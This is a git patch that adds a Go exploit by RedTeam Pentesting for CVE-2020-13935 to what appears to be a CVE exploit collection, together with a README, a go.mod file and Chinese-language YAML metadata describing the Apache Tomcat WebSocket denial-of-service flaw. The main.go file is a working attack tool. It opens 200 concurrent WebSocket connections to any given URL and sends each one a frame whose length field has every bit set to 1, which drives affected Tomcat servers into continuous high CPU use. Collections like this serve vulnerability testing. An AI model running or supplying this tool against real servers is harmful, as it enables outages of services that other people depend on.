From a3afc335afec7ecd101e160cdc514e8cf0a92182 Mon Sep 17 00:00:00 2001 From: lpy_888 Date: Mon, 13 Mar 2023 12:29:15 +0800 Subject: [PATCH 1/2] add CVE-2020-13935 --- .../2020/CVE-2020-13935/.gitignore | 1 + cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE | 8 ++ .../2020/CVE-2020-13935/README.md | 16 +++ cve/apache-Tomcat/2020/CVE-2020-13935/go.mod | 5 + cve/apache-Tomcat/2020/CVE-2020-13935/go.sum | 2 + cve/apache-Tomcat/2020/CVE-2020-13935/main.go | 130 ++++++++++++++++++ .../2020/yaml/CVE-2020-13935.yaml | 24 ++++ openkylin_list.yaml | 2 + 8 files changed, 188 insertions(+) create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/README.md create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/go.mod create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/go.sum create mode 100755 cve/apache-Tomcat/2020/CVE-2020-13935/main.go create mode 100644 cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore new file mode 100755 index 00000000..0f421f64 --- /dev/null +++ b/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore @@ -0,0 +1 @@ +tcdos diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE new file mode 100755 index 00000000..9fc105fe --- /dev/null +++ b/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE @@ -0,0 +1,8 @@ +Copyright 2020 RedTeam Pentesting GmbH + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/README.md b/cve/apache-Tomcat/2020/CVE-2020-13935/README.md new file mode 100755 index 00000000..4aad55a8 --- /dev/null +++ b/cve/apache-Tomcat/2020/CVE-2020-13935/README.md @@ -0,0 +1,16 @@ +# Exploit for WebSocket Vulnerability in Apache Tomcat (CVE-2020-13935) + +In the corresponding [blog post](https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/) +the analysis and exploitation of the vulnerability is explained in detail. + +## Usage + +Clone the repository, then build the `tcdos` binary. Run the program as follows to test +whether a particular WebSocket endpoint is vulnerable: + +``` +$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935 +$ cd CVE-2020-13935 +$ go build +$ ./tcdos [WebSocket endpoint] +``` diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod new file mode 100755 index 00000000..50a371a6 --- /dev/null +++ b/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod @@ -0,0 +1,5 @@ +module tcdos + +go 1.14 + +require github.com/gorilla/websocket v1.4.2 diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum new file mode 100755 index 00000000..85efffd9 --- /dev/null +++ b/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum @@ -0,0 +1,2 @@ +github.com/gorilla/websocket v1.4.2 h1:+/TMaTYc4QFitKJxsQ7Yye35DkWvkdLcvGKqM+x0Ufc= +github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE= diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/main.go b/cve/apache-Tomcat/2020/CVE-2020-13935/main.go new file mode 100755 index 00000000..41acdcdb --- /dev/null +++ b/cve/apache-Tomcat/2020/CVE-2020-13935/main.go @@ -0,0 +1,130 @@ +/**************************************** + * * + * RedTeam Pentesting GmbH * + * kontakt@redteam-pentesting.de * + * https://www.redteam-pentesting.de/ * + * * + ****************************************/ + +package main + +import ( + "bytes" + "fmt" + "os" + "sync" + "time" + + "github.com/gorilla/websocket" +) + +// CVE-2020-13935 +// +// this program exploits a bug in tomcat which leads to continuous, +// high cpu usage if all bits of the length field of a websocket message +// are set to 1. +// +// Affected Versions: +// 10.0.0-M1 to 10.0.0-M6 +// 9.0.0.M1 to 9.0.36 +// 8.5.0 to 8.5.56 +// 8.0.1 to 8.0.53 +// 7.0.27 to 7.0.104 +// +// see: +// https://bz.apache.org/bugzilla/show_bug.cgi?id=64563 +// https://access.redhat.com/security/cve/CVE-2020-13935 + +func main() { + if err := run(); err != nil { + fmt.Fprintln(os.Stderr, err) + } +} + +func sendInvalidWebSocketMessage(url string) error { + ws, _, err := websocket.DefaultDialer.Dial(url, nil) + + if err != nil { + return fmt.Errorf("dial: %s", err) + } + + // +-+-+-+-+-------+-+-------------+-------------------------------+ + // 0 1 2 3 + // 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + // +-+-+-+-+-------+-+-------------+-------------------------------+ + // |F|R|R|R| opcode|M| Payload len | Extended payload length | + // |I|S|S|S| (4) |A| (7) | (16/64) | + // |N|V|V|V| |S| | (if payload len==126/127) | + // | |1|2|3| |K| | | + // +-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - + + // | Extended payload length continued, if payload len == 127 | + // + - - - - - - - - - - - - - - - +-------------------------------+ + // | | Masking-key, if MASK set to 1 | + // +-------------------------------+-------------------------------+ + // | Masking-key (continued) | Payload Data | + // +-------------------------------- - - - - - - - - - - - - - - - + + // : Payload Data continued ... : + // + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + // | Payload Data continued ... | + // +---------------------------------------------------------------+ + + var buf bytes.Buffer + + fin := 1 + rsv1 := 0 + rsv2 := 0 + rsv3 := 0 + opcode := websocket.TextMessage + + buf.WriteByte(byte(fin<<7 | rsv1<<6 | rsv2<<5 | rsv3<<4 | opcode)) + + // always set the mask bit + // indicate 64 bit message length + buf.WriteByte(byte(1<<7 | 0b1111111)) + + // set msb to 1, violating the spec and triggering the bug + buf.Write([]byte{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}) + + // 4 byte masking key + // leave zeros for now, so we do not need to mask + maskingKey := []byte{0, 0, 0, 0} + buf.Write(maskingKey) + + // write an incomplete message + buf.WriteString("test") + + _, err = ws.UnderlyingConn().Write(buf.Bytes()) + if err != nil { + return fmt.Errorf("write: %s", err) + } + + // keep the websocket connection open for some time + time.Sleep(30 * time.Second) + + return nil +} + +func run() error { + if len(os.Args) != 2 { + return fmt.Errorf("usage: %s target_url", os.Args[0]) + } + + targetURL := os.Args[1] + + var wg sync.WaitGroup + + for i := 0; i < 200; i++ { + wg.Add(1) + go func() { + defer wg.Done() + + if err := sendInvalidWebSocketMessage(targetURL); err != nil { + fmt.Println(err) + } + }() + } + + wg.Wait() + + return nil +} diff --git a/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml new file mode 100644 index 00000000..e5175da2 --- /dev/null +++ b/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-13935 +source: https://github.com/RedTeamPentesting/CVE-2020-13935 +info: + name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 + severity: high + description: | + Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 + scope-of-influence: + Apache Tomcat 10.0.0-M1-10.0.0-M6 + Apache Tomcat 9.0.0.M1-9.0.36 + Apache Tomcat 8.5.0-8.5.56 + Apache Tomcat 8.0.1-8.0.53 + Apache Tomcat 7.0.27-7.0.104 + reference: + - https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ + - https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2020-13935 + cwe-id: CWE-835 + cnvd-id: None + kve-id: None + tags: cve2020,Apache Tomcat,拒绝服务 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a2eaf02..4a9e7b78 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -10,6 +10,8 @@ cve: - CVE-2021-27905 apache-Spark: - CVE-2022-33891 + apache-Tomcat: + - CVE-2020-13935 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee From 67bbaac80341db23be773df33b9c0d1ac80146ac Mon Sep 17 00:00:00 2001 From: lpy_888 Date: Mon, 13 Mar 2023 14:41:40 +0800 Subject: [PATCH 2/2] add CVE-2020-13935 --- .../2020/CVE-2020-13935/.gitignore | 0 .../2020/CVE-2020-13935/LICENSE | 0 .../2020/CVE-2020-13935/README.md | 0 cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.mod | 0 cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.sum | 0 .../2020/CVE-2020-13935/main.go | 0 .../2020/yaml/CVE-2020-13935.yaml | 2 +- openkylin_list.yaml | 2 +- 8 files changed, 2 insertions(+), 2 deletions(-) rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/.gitignore (100%) rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/LICENSE (100%) rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/README.md (100%) rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.mod (100%) rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/go.sum (100%) rename cve/{apache-Tomcat => apache-tomcat}/2020/CVE-2020-13935/main.go (100%) rename cve/{apache-Tomcat => apache-tomcat}/2020/yaml/CVE-2020-13935.yaml (95%) diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore similarity index 100% rename from cve/apache-Tomcat/2020/CVE-2020-13935/.gitignore rename to cve/apache-tomcat/2020/CVE-2020-13935/.gitignore diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE similarity index 100% rename from cve/apache-Tomcat/2020/CVE-2020-13935/LICENSE rename to cve/apache-tomcat/2020/CVE-2020-13935/LICENSE diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/README.md b/cve/apache-tomcat/2020/CVE-2020-13935/README.md similarity index 100% rename from cve/apache-Tomcat/2020/CVE-2020-13935/README.md rename to cve/apache-tomcat/2020/CVE-2020-13935/README.md diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-tomcat/2020/CVE-2020-13935/go.mod similarity index 100% rename from cve/apache-Tomcat/2020/CVE-2020-13935/go.mod rename to cve/apache-tomcat/2020/CVE-2020-13935/go.mod diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-tomcat/2020/CVE-2020-13935/go.sum similarity index 100% rename from cve/apache-Tomcat/2020/CVE-2020-13935/go.sum rename to cve/apache-tomcat/2020/CVE-2020-13935/go.sum diff --git a/cve/apache-Tomcat/2020/CVE-2020-13935/main.go b/cve/apache-tomcat/2020/CVE-2020-13935/main.go similarity index 100% rename from cve/apache-Tomcat/2020/CVE-2020-13935/main.go rename to cve/apache-tomcat/2020/CVE-2020-13935/main.go diff --git a/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml similarity index 95% rename from cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml rename to cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml index e5175da2..a8c37b12 100644 --- a/cve/apache-Tomcat/2020/yaml/CVE-2020-13935.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml @@ -21,4 +21,4 @@ info: cwe-id: CWE-835 cnvd-id: None kve-id: None - tags: cve2020,Apache Tomcat,拒绝服务 + tags: cve2020, Apache Tomcat, 拒绝服务 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 4a9e7b78..f9779633 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -10,7 +10,7 @@ cve: - CVE-2021-27905 apache-Spark: - CVE-2022-33891 - apache-Tomcat: + apache-tomcat: - CVE-2020-13935 linux-kernel: - CVE-2021-4204 -- Gitee